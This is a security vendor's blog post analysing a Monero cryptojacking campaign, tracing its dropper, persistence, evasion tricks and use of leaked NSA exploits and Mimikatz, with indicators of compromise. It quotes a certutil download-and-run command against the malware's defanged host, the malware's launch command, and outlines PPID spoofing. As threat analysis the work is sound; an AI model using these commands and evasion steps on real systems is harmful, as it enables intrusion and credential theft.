Cryptojacking: An Unwanted Guest

  • We analyse a cryptojacking attack that mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. The rebound of the cryptocurrencies market means that cryptojacking is an increasingly profitable activity for criminals.
  • The use of freely-available exploits such as EternalBlue and DoublePulsar shows how exploits that were previously only available to nation state actors are gradually adopted by less sophisticated cybercrime players.
  • The use of Mimikatz, masscan and WinPcap also raises the question about the aims of the attackers beyond simply distributing coin mining malware.
  • Historically, coin mining malware has been regarded as a low severity threat, but attacks such as this demonstrate how this threat category has become more nefarious. Coin miners have started using techniques used by banking Trojans to evade detection, such as living-off-the-land binaries (LOLBins) for code execution, parent process ID (PPID) spoofing, and hiding files and payloads after execution to remain discreet.


The early adopters of cryptocurrencies like Bitcoin, Ethereum and Litecoin were privacy-conscious individuals and currency enthusiasts. Over time, however, the inherent pseudonymous properties of cryptocurrencies has attracted people with less noble intentions – those who wish to reduce the traceability of financial transactions associated with criminal activities. 

One of the fundamental requirements for cryptocurrencies is to verify the accuracy of each transaction’s details to ensure transactions remain secure and trustworthy. There is no concept of managing authority in cryptocurrencies, and the job of verification is performed by a community of global users, often referred to as “miners”. The transaction details of cryptocurrencies like Bitcoin are publicly available. A collection of transaction records forms a unit called “block”. After a transaction is verified, each block is assigned a unique code called a“hash” and the complete transaction record is compiled to form a blockchain ledger. The process of verifying and adding the transaction details back into the blockchain requires solving complex and computationally-intense hashing problems. In exchange for solving these problems, miners are awarded a certain number of cryptocurrencies. 

Solving the hashing problem takes substantial computing power, but can be sped up by using GPUs and specialist hardware called an ASIC (Application-Specific Integrated Circuit). ASICs are extremely costly and require considerable cooling effort, resulting in astronomical electricity bills for their owners. Without a doubt, cryptocurrency mining is a costly enterprise. 


Covert mining using stolen resources is called “cryptojacking”. Coin miner malware can also be delivered through a variety of methods including malicious email attachments, hyperlinks, drive-by downloads, compromising common JavaScript libraries such as JQuery, and exploiting vulnerabilities in Internet-facing devices such as email and web servers. 

Attackers have also started using post-exploitation tools, enabling them to infect multiple computers by moving laterally within the compromised network. Cryptojacking activity tends to follow the value of cryptocurrencies. As the value of cryptocurrencies increases, cryptojacking becomes an increasingly profitable activity for criminals. It also has benefits over other means of generating revenue, such as ransomware: 

  • Ransomware is typically a one-time activity, and most enterprises don’t honour demands for the ransom. 
  • Ransomware attacks attract the attention of law enforcement agencies. 
  • If third-party ransomware is used, developers typically take a cut of any ransom money that is paid. 
  • The development of ransomware requires more skill than a coin miner. 
  • Detecting a coin miner is difficult compared to most malware because mining software can be used legitimately. 
  • Once a coin miner is deployedan actor can monetise the infected host for as long as the host is online. 

Infection Chain

Recently we came across a URL delivering coin mining malware. The payload was isolated by Bromium Secure Platform and provided a lot of data for understanding how the attack works. In this blog post, we analyse its behaviour and how it uses a suite of post-exploitation tools, including EternalBlue, to extend the intrusion into the victim’s network. This wasn’t your typical coin mining malware. 

The malware mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. This appreciation is one possible reason why cryptojacking attacks are increasingly attractive to attackers. Monero, in particular, is favoured by criminal actors because it is less resource intensive to mine since it does not require an ASIC, unlike other cryptocurrencies. Ultimately, this means that attackers can target low-powered devices and still turn a profit. 

Figure 1 – Monero’s value in USD from December 2018 to June 2019, source -

Figure 1 – Monero’s value in USD from December 2018 to June 2019 (source:

Behavioral Analysis  

  • Main dropper
  • Filename: download.exe 
  • Size: 90 KB (92160 bytes) 
  • MD5: 0fe77bc5e76660ad45379204aa4d013c 
  • SHA1: 189D75F6485B7F220B143C0DD548D97BD7D81E3F 
  • SHA256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b 

This portable executable (PE) file is delivered through a URL. Looking at the sections of the file in PEStudio, suggests that it was packed using UPX, an open source packer. 

Figure 2 - UPX packed binary

Figure 2 – UPX packed binary.

When run, download.exe unpacks itself and copies the unpacked file to “C:\WebKitsSdk\2.7.92” with the name ophgsf.exe. 

Figure 3 - download.exe unpack PE file ophgsf.exe

Figure 3 – File write event after download.exe is unpacked. 

The newly written file is then run as a child process of download.exe. 

Figure 4 – download.exe launches process ophgsf.exe 

Figure 4 – Download.exe launches process ophgsf.exe.

The process then copies itself to C:\Windows\SysWOW64 with the name tgvbgq.exe and marks it as a hidden file. 

Figure 5 – Process ophgsf.exe copies itself to another location then hide it 

Figure 5 – Process ophgsf.exe copies itself to another location then hides it.

To make the malware persistent on the system, ophgsf.exe creates and launches a new service called Abcdef where the BinaryPath points to C:\Windows\System32\tgvbgq.exe. Because the CreateService API is called from a 32-bit process, the service’s configuration is set to WOW64When process ophgsf.exe calls StartService API to launch the binary registered as service, it launches the binary from C:\Windows\SysWOW64 directory instead of C:\Windows\System32\tgvbgq.exe that was provided in the binary path due to Wow64 redirection. The service is granted the following rights through the DesiredAccess parameter value (0xF0137):  


  Figure 6 – Service creation to establish persistence 

Figure 6 – Service creation to establish persistence.

Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable. After starting the serviceophgsf.exe copies itself from C:\WebKitsSdk\2.7.92 to C:\Windows\SysWOW64 as “126860.bak and then terminates itself. 

Figure 7 – ophgsf.exe deletes its binary and creates a backup file

Figure 7 – Ophgsf.exe deletes its binary and creates a backup file.

A PE file called SunloglicySrv.exe is downloaded and run by download.exe from the URL hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and saved to C:\WebKitsSdk\2.7.92\. Bromium Cloud Service classifies this threat as Win32.Trojan.Miner

Figure 8 – Http request and response to download file SunloglicySrv.exe 

Figure 8 – HTTP GET request and response to download file SunloglicySrv.exe.

Figure 9 – download.exe executes coin-miner SunloglicySrv.exe 

Figure 9 – Download.exe runs coin miner SunloglicySrv.exe.

After starting the coin miner process (SunloglicySrv.exe), download.exe then launches the certutil tool using command prompt (cmd.exe). Certutil is a Windows built-in tool used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally: 

certutil.exe -urlcache -split -f [URL] DestinationFile 

In this case, the provided URL is hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and the destination file is %SystemRoot%\Temp\SunloglicySrv.exe. 

We see certutil being frequently misused as a LOLBin by malicious actors. One of the reasons why malware authors prefer to download a payload using certutil because using a signed Microsoft tool is less likely to be detected than using third party programs. If the download using certutil was successful, cmd.exe runs the file. We found that the file (SunloglicySrv.exe) was the same coin miner that was downloaded and launched earlier by download.exe. 

Figure 10 – Use of CertUtil tool to download a payload from a URL 

Figure 10 – Use of certutil to download a payload from a URL.

Afterwards, download.exe moves itself to the directory “%TEMP%\127172\….\” and saves the file with a name “TemporaryFile”. It then renames the directory “….” to “%TEMP%\127172\”. The reason for copying a file and then renaming a directory in this way is to break file tracking. The Windows file system doesn’t provide callbacks for files within the directory during a directory rename operation, and this technique allows malware authors bypass tracking of their binary by security solutions and makes the job of an auditor a whole lot harder. Finally, download.exe ends its process.

Figure 11 – download.exe moves process binary to a temporary location 

Figure 11 – Download.exe copies itself to the user’s %TEMP% directory.

SunloglicySrv.exe (Win32.Trojan.Mbt) 

The coin miner process is launched from C:\WebKitsSdk\2.7.92 and copies itself to C:\Windows\ugrpkute with the name tpcunli.exe. Once a copy is created, it follows the same technique of breaking file tracking by moving the file from C:\WebKitsSdk\2.7.92 to C:\Users\bruser1729\AppData\Local\Temp\127437\….\ using the file name “TemporaryFile”, before renaming the directory to C:\Users\bruser1729\AppData\Local\Temp\127437\. 

  • Filename: tpcunli.exe  
  • File Path: C:\Windows\ugrpkute 
  • SHA256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81 
  • Bromium Cloud Service classification: Win32.Trojan.Mbt 
Figure 12 – SunloglicySrv.exe moves process binary to a temporary location 

Figure 12 – SunloglicySrv.exe copies itself to the user’s %TEMP% directory.

The process then runs tpcunli.exe from cmd.exe using the start command. It joins the command with a ping command that delays the launch of the program by five seconds. This is common way to delay the execution of commands. After running the command, SunloglicySrv.exe ends its process.

cmd /c ping -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe 

tpcunli.exe (Win32.Trojan.Coinminer) 

The process begins by modifying itself with another payload. Afterwards, it creates a service called “plikeztuc” where BinaryPath points to C:\Windows\ugrpkute\tpcunli.exe and the DesiredAccess is 0xF0137. After creating the service, it ends its process. 

Figure 13 – Service “plikeztuc” creation to establish persistence 

Figure 13 – Service creation to establish persistence.

tpcunli.exe (Win32.Trojan.Mbt) 

  • Filename: tpcunli.exe  
  • File Path: C:\Windows\ugrpkute 
  • SHA256: 69481183822cbc5972843308746f1b32426c68375acd82ebe84f04930a4800ef 
  • Bromium Cloud Service classification: Win32.Trojan.Mbt 

The process runs the cacls tool which is used modify access control lists (ACLs). Specifically, it deletes the permissions to access the /etc/hosts file for members of the users and administrators group and the system user. 

Figure 14 – Deletes ACLs permission for /etc/host file 

Figure 14 – Removal of access to /etc/hosts file.

The process also hides the current user’s Internet history and cookie files by changing their file properties and placing desktop.ini files in each subdirectory. 

Figure 15 – “tpcunli.exe” hides internet history 

Figure 15 – Hidden Internet history files.

Next, it runs netsh commands to block incoming Server Message Block (SMB) traffic. The command resembles those used by WannaCry, where it exploited an SMB version 1 vulnerability and applied similar IPSec policies to block TCP port 445. 

Figure 16 – Netsh commands to apply IPSec policy to block incoming SMB traffic.

The process drops various publicly available tools and exploits, such as those exposed by The Shadow Brokers in 2017. These tools were developed by National Security Agency’s Equation Group and have been used by several malware authors, including the creators of WannaCry.  

  • EternalChampion
  • EternalBlue 
  • EquationDrug 
  • EternalRomance 
  • Smbtouch-Scanner
  • DoublePulsar backdoor 
  • WinPcap 
  • Mimikatz 
  • ProcDump 
  • Exploit based on CVE-2017-8464 
  • masscan 
Figure 17– “tpcunli.exe” drops post–exploit tools along with EquationGroup tools

Figure 17 – Dropping of post–exploitation tools, including Equation Group exploits.

Next tpcunli.exe installs WinPcap version 4.1.3 using silent mode flat (“/S”). The properties of this file show that it was taken from a product called BMC TrueSight installer.

Figure 17 – Installation of WinPcap tool using silent installation command /S  

Figure 18 – Silent installation of WinPcap.

Figure 18 – WinPcap.exe file properties reveals that it was taken from the BMC TrueSight Installer 

Figure 19 – WinPcap.exe file properties.

The WinPcap installer attempts to stop the services of BMC TrueSight and restarts the Netgroup Packet Filter (NPF) driver. 

Figure 19 – WinPcap stops services of BMC software

Figure 20 – WinPcap stops services of BMC software.

Tpcunli.exe runs masscan (bgichmvs.exe) through cmd.exe and uses it to scan for open ports of public IP ranges. Because masscan is dependent on the WinPcap driver (npf.sys), this likely explains why WinPcap was installed 

Figure 20 – Post scanner scans subnet and port 80 and generate output in JSON format 

Figure 21 – Port scanner scans subnet for open TCP port 80 and generates output in JSON format.

Next tpcunli.exe writes a list of hardcoded public IP address ranges to a file called ip.txt. Afterwards it launches masscan and provides the list of IP ranges as input to scan for open TCP port 7001 at a rate of 4096 packets per seconds and write output in JSON format. We believe it does so to find exposed Oracle Weblogic servers that are listening on port 7001 that may be vulnerable to CVE-2017-10271. 

Figure 21 – List of hardcoded IPs ranges dropped by process “tpcunli.exe”

Figure 22 – List of hardcoded IP ranges.

Figure 22- Masscan tool scans range of hardcoded IPs for port 7001

Figure 23 – Masscan command scanning for TCP port 7001 in the IP ranges provided.

Next tpcunli.exe runs Mimikatz (vfshost.exe) to extract credentials lsass.exe (Local Security Authority Subsystem Service) process using its sekurlsa module. This module retrieves a password in plain text format, which can be used for further attacks using the passthehash technique. If the command is running as Administrator then it requires debug privilege rights. 

Figure 21 – Dumping passwords using the “sekurlsa” module 

Figure 24 – Dumping passwords using the sekurlsa module.


Figure 22 – Mimikatz command output saved in log.txt 

Figure 25 – Mimikatz command output saved in log.txt.

Tpcunli.exe copies itself to C:\Windows\IME using the file name masruql.exe. It then runs Windows Task Scheduler (schtasks.exe) to create two scheduled tasks. The first is called “qnsegabbm” which runs masruql.exe using the SYSTEM account and reoccurs every minute. The second is called “senutquec” which runs a command that modifies the user access rights of C:\Windows\ugrpkute\tpcunli.exe to allow everyone. This reoccurs every minute and uses the SYSTEM account.

Figure 23 – Creation of Scheduled task “qnsegabbm” 

Figure 26 – First scheduled task.

Figure 24 – Creation of Scheduled task “senutquec” 

Figure 27 – Second scheduled task.

Afterwards, tpcunli.exe drops another payload (enakii.exe) and its configuration file in C:\Windows\temp\zceliqcqn. The configuration file matches that used by XMRig, a free Monero coin miner, suggesting that malware is based on that software. 

Payload Properties

  • Filename: enakii.exe 
  • Location: C:\Windows\temp\zceliqcqn 
  • SHA256: 245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7 
  • Bromium Cloud Service classification: Win32.Trojan.Coinminer 
Figure 25 – Configuration file of emakii.exe (Monero coin-miner) 

Figure 28 – Configuration file of emakii.exe (XMRig Monero coin miner).

After dropping the payload, a third scheduled task is created called “kqivnbrqa”. It modifies the user access rights of C:\Windows\TEMP\zceliqcqn\enakii.exe to allow everyone. This task is set to reoccur every minute and is run using the SYSTEM account.

Figure 26 – Creation of Scheduled task ‘kqivnbrqa’

Figure 29 – Third scheduled task.

Tpcunli.exe performs a PPID spoofing technique to launch the child process enakii.exe. Using PPID spoofing, it indirectly executes C:\Windows\TEMP\zceliqcqn\enakii.exe by launching enakii.exe as a child process of C:\Windows\System32\Spoolsv.exe.  

One of the ways malware can perform PPID spoofing is to open handle on a target parent process, call UpdateProcThreadAttribute to update the attribute list in the STARTUPINFOA structure of child processes, and then change PROC_THREAD_ATTRIBUTE_PARENT_PROCESS with the handle of process target parent process. 

Figure 27 – Launch of emaki.exe via spoolsv.exe 

Figure 30 – Launch of emaki.exe via spoolsv.exe.

Tpcunli.exe also drops a tool (ouousbpro.exe) used to exploit CVE-2017-8464 by creating shortcut files (.LNK) for all non-existent drives. We believe it does this to spread to removable media and network drives. 

Figure 28 – Execution of exploit (CVE-2017-8464) “ouousbpro.exe” 

Figure 31 – CVE-2017-8464 exploit tool ouousbpro.exe.


Figure 29 – “ouousbpro.exe” creates  a .lnk file for a non-existing drive

Figure 32 – Creation of .LNK files for non-existent drives.

Figure 30 – Content of .lnk file FlashPlayer_K.lnk 

Figure 33 – Content of .LNK file FlashPlayer_K.lnk

If the process continues to run, it tries to exploit an existing vulnerability in the system to move laterally.   

Figure 31 – Process interaction graph as viewed in Bromium Controller

Figure 34 – Process interaction graph viewed in Bromium Controller.

The graph below shows the chain of events captured in the micro VM, which includes the dropping of payloads, indirect execution of processes and high severity events triggered by known malware behavioural patterns.

Figure 32 – High severity events raised during the infection lifecycle. It helps in visualizing the chain of traces captured in μVM, which includes a drop of payloads, indirect execution of processes along with other High severity events matched against behavior analysis rules.

Figure 35 – High severity events raised during the infection life cycle.

Interesting Memory Strings – tpcunli.exe 

In our analysis, we found that tpcunli.exe was very noisy and drops all of the post-exploitation tools on the system. Additional memory strings were identified that hint at what else this malware does:

  • List of common passwords 
  • List of file extensions 
  • List of domain names 
  • Commands to dump the process memory of certain processes using Procdump which are then fed into Mimikatz to extract credentials: 


  • Commands to disable Windows firewall, SharedAccess, Windows Defender services.

Figure 36 – Hardcoded commands in memory to disable Windows Defender, Firewall and SharedAccess.

  • Fetch a configuration file cfg.ini from the following URLs:


Figure - Content of the configuration file cfg.ini

Figure 37 – Contents of configuration file cfg.ini.

  • Use the following domain strings to download the coin miner payload:


  • Try to move laterally within the network using known credentials.
Figure – Lateral movement using wmic command

Figure 38 – Lateral movement using WMIC commands.

Threat Classifications

Figure 33 – Classification of dropped files by Bromium Cloud Service

Figure 39 – Classification of dropped files by Bromium Cloud Service.

Indicators of Compromise (IOCs) 

Delivery URLhxxp://fid[.]hognoob[.]se
Delivery URLhxxp://q1a[.]hognoob[.]se
Delivery URLhxxp://uio[.]hognoob[.]se
Delivery URLhxxp://upa1[.]hognoob[.]se
Delivery URLhxxp://upa2[.]hognoob[.]se
SHA256 (download.exe[Win32.Trojan.Tiny])6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
SHA256(enakii.exe [Win32.Trojan.Coinminer])245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7
SHA256(enakii.exe [Win32.PUA.Coinminer])a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA256(cnli-1.dll [Win32.Trojan.Shadowbrokers])0b50ef057047b4adace04a392d31b31560e3ed070a8aece2a7c245503c5d7edb
SHA256(exma-1.dll [Win32.Trojan.Shadowbrokers])c8e5eeee3a4704cbf35c485ed2936f6d8720d86c0d49a64359af7e08c27e61fd
SHA256(posh-0.dll [Win32.Trojan.Shadowbrokers])d63ecb86b101ac8002f4215929b0c7262bcc5ac3323e278afc5270c8e9da660b
SHA256(tibe-2.dll [Win32.Trojan.Shadowbrokers])c2f9a4a173d7c5b905323fd1a432bb76f9b9734d80ec5e1d5ec758b69ae1d81b
SHA256(tucl-1.dll [Win32.Trojan.Shadowbrokers])7f5bac325d514575418f263f5f166976784ad187e3982bd3a1cced70223f2029
SHA256(xdvl-0.dll [Win32.Trojan.Shadowbrokers])d3cf391dee14a3828e4c5c3698c3e64e5020c59b42ae025d5d2f22fb99a89e92
SHA256(svschost.exe [Win32.Trojan.Shadowbrokers])99daedf435d5eb1631ff628b7cd0dc7284c069354954036f835a006d9858e09c
SHA256(spoolsrv.exe [Win32.Trojan.Shadowbrokers])766dd3cce14076922a7140da3b02d306f6d999dcef8f060ff5fa8ea21682b169
SHA256(docmicfg.exe [Win32.Trojan.Shadowbrokers])8006579fde0c4f3aeb6da80d1e2c821d78a2d3b079ff050816c6d7fa795a1b7e
SHA256(schoedcl.exe [Win32.Trojan.Shadowbrokers])da1afbd0cfcbdacf928b982560ef752d23167ca96bafd683bc81f2642a73ece0
SHA256(trch-1.dll [Win32.Trojan.Shadowbrokers])1bd4b18142d875e9e793e8d4307251bd4f8b81e19a5a35a9c536fe0053e2c76e
SHA256(libeay32.dll [Win32.Trojan.Equation])f56bca94ee4257a4d78ae5f8d9dc11028dd94757722e40999d8a7846754ac54c
SHA256(libxml2.dll [Win32.Trojan.Equation])fcd1069d15994559bbb3c7ea141126c71c74267510460283e3ec3197f36504e8
SHA256(trfo-2.dll [Win32.Trojan.Equation])403513985ac62ea28005fed60919ed24fc8d67770a4a10f015ed899c237d92e3
SHA256(ucl.dll [Win32.Trojan.Equation])65eb7225f9a5f1c6de695ec879b861e95d3679d9595dcc13a07bf05fd4e4032f
SHA256(vimpcsvc.exe [Win32.Trojan.Equation])99505e6395d0722c0107cee97650ede6d1ad89760fd72bdd8739a6507957cebc
SHA256(Shellcode.ini [Win32.Trojan.Doublepulsar])ff8c9d8c6f16a466d8e598c25829ec0c2fb4503b74d17f307e13c28fd2e99b93
SHA256(vfshost.exe [Win32.Hacktool.Mimikatz])441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA256(mimidrv.sys [Win32.Hacktool.Mimikatz])443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85
SHA256(mimilib.dll [Win32.Hacktool.Mimikatz])3b7b052ac344822dd65831cfd54e935c7fe8e302f18415958a9a524af36dc62a
SHA256(FlashPlayerCPLApp.cpl [Win32.Trojan.Siscos])40013be8bf118ebb41f9becbde7e851cb31acc0c4e3ffa59c9cd3eeddc9cf52c
SHA256(ouousbpro.exe [Win32.Trojan.CVE-2017-8464])8b49f419e00a1e8e8044e06e5b715a28d72beea72006969db648721bcf73d80b
SHA256(zlib1.dll [Win32.Trojan.Equationdrug])3f74b26f96eb526dc5fb49c36b4e0ca1cc95c92e5c9c0fa935432b53ea2012de

The post Cryptojacking: An Unwanted Guest appeared first on Bromium.

*** This is a Security Bloggers Network syndicated blog from Bromium authored by Ratnesh Pandey. Read the original post at: